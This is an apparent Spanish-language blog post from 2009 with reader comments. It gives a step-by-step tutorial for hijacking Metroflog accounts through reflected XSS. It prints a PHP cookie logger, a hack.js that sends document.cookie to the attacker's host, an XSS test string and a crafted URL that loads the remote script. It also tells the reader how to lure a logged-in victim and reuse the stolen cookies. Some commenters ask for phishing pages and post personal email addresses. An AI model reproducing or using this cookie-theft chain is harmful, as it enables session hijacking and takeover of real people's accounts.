Seguridad informática explicado en unos básicos pasos, desde como eliminar un virus, quitar restricciones de los sistemas operativos, buscar códigos maliciosos en el sistema como el análisis de cracks, keygens, bugs. También encontraras manuales de programas para su multi-uso.
| |
Hackear metroflog
Publicado por Israel Rangel - 30/12/09 a las 12:12:41 am
Primero aclaro que en este blog no se hablan de temas sobre como hackear temas de redes sociales con tales programas, este tema va principalmente derivado de vulnerabilidades dentro de este sistema metroflog (y estreno esta nueva categoría ya que varios seguidores me han pedido que hable sobre esto, que va dentro de la seguridad informática, y así será), por lo que descartamos temas ilegales. Este ataque se efectúa mediante ataques XSS.
Primero tendremos que contar con un hosting que soporte PHP. Esta byethost ó zobyhost.
Posteriormente necesitamos crear 3 archivos que serán robando_cookies.php, hack.js y cookies.txt.
robando_cookies.php
<?php
$cookies = $_GET['cookie'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip n”);
fwrite($guardando, “Hora: $hora n”);
fwrite($guardando, “Valores de las cookies: n”);
fwrite($guardando, “$cookies n”);
fclose($guardando);
?>
hack.js
window.location=’tuhost.com/roba_cookies.php?cookie=’+document.cookie
0
Ya de haberlos creado, hay que subirlos a nuestro servidor vía FTP, cuando ya este hecho esto, tendremos que localizar el metroflog a hackear, para eso tendremos que buscar la ultima foto que ha subido (la más actual) y que la URL del metroflog quede así:
http://www.metroflog.com/hackear/20091020/foto?pos=20090715&nf=
Procederemos a eliminar la fecha de la foto por lo que quedará así:
http://www.metroflog.com/hackear/20091020/foto?pos=
Ahora, para saber si es vulnerable a un ataque XSS, tendremos que inyectarle código para saber si es vulnerable, para eso hay que agregar el siguiente código en la URL del metroflog:
http://www.metroflog.com/hackear/20091020/foto?pos=<script>alert(/Hacked by%2InfoMalwares)</script>
Al ejecutar este comando, tendrá que aparecer una ventana estilo pop-up diciendo Hacked by InfoMalwares, si aparece quiere decir que es vulnerable y procederemos a hackearle, y si no es vulnerable, no hay nada más que hacer, habrá que recurrir a otro método.
Para robar la cookie a la víctima, tenemos que decirle que te firme tu metroflog, para eso tendrás que enviarle la dirección de la siguiente forma:
http://www.metroflog.com/mimetro/20091020/foto?pos=”><script src=”http://tuhostconphp.com/hack.js”>
**NOTA**: Tenemos que asegurarnos que tu víctima ya haya iniciado su sesión en el metroflog antes de enviarle la URL.
Lo que ara este archivo hack.js es procesar las cookies de la víctima para usarlos tu y enviarlos al archivo cookies.txt, con esto podrás iniciar sesión en su cuenta sin saber su contraseña ^^.
Cuando el usuario ya haya visitado esa URL, te estará enviando automáticamente sus cookies, después de esto puedes descargar el programa IEcv para modificar tus cookies por las de la víctima.
Ya al haberlas cambiado y actualizado por las cookies de la víctima (para eso hay que ver el fichero cookies.txt localizado en tu carpeta del FTP) hay que entrar desde el Internet Explorer al metroflog de la víctima, y estarás como administrador de la cuenta ^^.
Palabras clave:
hackear metroflog • quitar metroflog • robar metroflog • vulnerabilidad metroflog • XSS metroflogTemas relacionados
Búsquedas a esta página
→ metroflog → hackear metroflog 2010 → como hackear un metroflog → como hackear un metroflog 2010 → hackear metroflog mediante cookies → codigos para hackear metroflog → hack metroflog 2010 → metro flog → hackear metroflog con cookies → como quitar un script de metroflog → ataque a metroflog → metroflog anti hacker → hakea metroflogs → hakear metroflog → iniciar sesion en metroflog → localizar ip de una pagina metroflog → metroflog hack → los mejores metroflog de irapuato → metroflog ftp haking → hacker metroflog 2010 → hackear un metroflog 2010 → hackear metroflog 2010 julio → hackear metroflog 2010 junio sin programas → hackear metroflog con codigos → hackear metroflog con ip → hackear metroflog con linux → script hackear metroflog → hackear metroflog cookies → hackear metroflog ubuntu → hackear metroflogs mediante cookies9 Comentarios »
RSS feed para los comentarios de esta entrada. TrackBack URI
Dejar un comentario
Manuales de seguridad
Comentarios
- Gerardo Muñoz: SANTO REMEDIO SE QUITO ESE PIN
- jhon rojas: Gracias por la información es
- Belén: genial =) no veo las horas de
- Renata: Busco info para mantenerme act
- Edward: Gracias por el post. Con el Ma
Busquedas recientes
Mas comentados
Categorías
- Boletines (rss) (3)
- Defacing (rss) (1)
- Fraude (rss) (6)
- General (rss) (4)
- Google/Android (rss) (13)
- Historial de InfoMalwares (rss) (8)
- Linux/GNU (rss) (2)
- Mac/OS (rss) (16)
- Mi proyecto de vida (rss) (2)
- Microsoft (rss) (22)
- Minijuegos (rss) (5)
- Navegadores (rss) (7)
- Phishing (rss) (25)
- Programación (rss) (3)
- Promociones (rss) (7)
- Redes sociales (rss) (24)
- Reseñas (rss) (50)
- Rogue (rss) (108)
- Scam (rss) (20)
- Seguridad (rss) (133)
- Softwares (rss) (22)
- Spam (rss) (25)
- Stealers (rss) (3)
- Virus Informáticos (rss) (6)
- Vulnerabilidades (rss) (4)
- Wordpress (rss) (1)
- WTF! (rss) (2)
Archivo
Enlaces
Turismo en México
Otros blogs
Meta
Este blog funciona gracias a WordPress e Internetizado. Cargo en 0,605s con 12 consultas
Entradas y Comentarios feeds. XHTML y CSS válidos.
kiero 100 firmas
Comentario por fernando uriel — 11 enero 2010 #
Bien, bien… Muy buen metodo… Todo debido al mal uso que hace el Metroflog con el control de sesiones de PHP.
Comentario por Rowinson — 7 febrero 2010 #
GENIAL!!!, primera pagina ke dice algo logico!!! en PHP!!!
Comentario por Hector — 22 febrero 2010 #
holaa q puedz ayudar con mi MF?? ezq m lo hakearon
ii qiero recuperarlo otra vez u__U m puedz ayudar?? xfaa ok ia amm wnu mi msn:
berenice_192@homail.com
Comentario por donnyCoree — 23 febrero 2010 #
Muy bien explicado y todo che. Pero, cuando le envio la direccion escondida en un enlace a mi victima, no lo redirecciona a robando_cookies.php , que creo que es la funcion de ” windows.location ” ¿No? .Si puedes explicame un poco mejor esa parte. Te dejo mi msn si quieres contactarme
marqoobolsilludo-14@hotmail.com
Suerte
Comentario por Marco — 9 mayo 2010 #
ho0la me po0drias ayudar? kiero0 una pagina fake es q no0 puedo0 acerla me ayudas?
Comentario por kike — 31 mayo 2010 #
[...] more from the original source: Hackear metroflog Share and [...]
Pingback por Hackear metroflog | Yoobz.com — 6 julio 2010 #
Quiero tmbn ke publiken pagina fake,
Comentario por Deivid — 6 julio 2010 #
ola a mi novia la hackearon su mf me podrias explicar mejor como se le kita el fake porfas dejos msn va espero respuestas
edgar_naruto_1098@hotmail.com
Comentario por edgar — 6 julio 2010 #